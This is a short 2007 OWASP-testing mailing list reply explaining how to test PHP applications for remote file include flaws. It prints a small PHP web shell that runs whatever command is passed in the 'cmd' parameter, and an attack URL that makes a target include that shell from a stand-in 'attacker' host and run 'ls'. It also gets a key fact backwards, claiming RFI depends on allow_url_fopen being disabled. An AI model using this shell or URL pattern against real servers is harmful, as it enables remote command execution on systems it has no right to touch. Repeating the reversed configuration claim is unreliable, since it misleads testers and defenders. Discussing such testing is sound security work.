[Owasp-testing] Remote File include vulnerability

Josh Zlatin-Amishav josh at ramat.cc
Tue Apr 10 13:32:01 EDT 2007


On Tue, 10 Apr 2007, Denise Spiteri wrote:

> Hi to all,
>
>           Can someone please tell me, how to carry out penetration testing
> for Remote File Include Vulnerability?

Most of the remote file include vulnerabilities reported are for PHP
apps which use the value of a user supplied variable to include PHP code
which is then executed by the server. Often times it is obvious from the
variable name or value that the variable is including code from another
file, but a complete code review will be more complete.

To test for remote file includes you should at a minimum manipulate the
given variable to include a remote file that will execute some code on 
the target. For PHP apps you can try a simple shell script like:

<?
$cmd = $_GET["cmd"]; print "[$cmd]\n";system($cmd);
?>

and then call your script via the vulnerable variable like:

http://[target]?index=http://attacker/cmd?&cmd=ls;foo=

where 'index' is a variable that includes remote PHP code. Remote file
includes are dependent on the server having allow_url_fopen disabled. If
the allow_url_fopen was enabled I might try for a directory transversal
attack instead.

--
  - Josh


More information about the Owasp-testing mailing list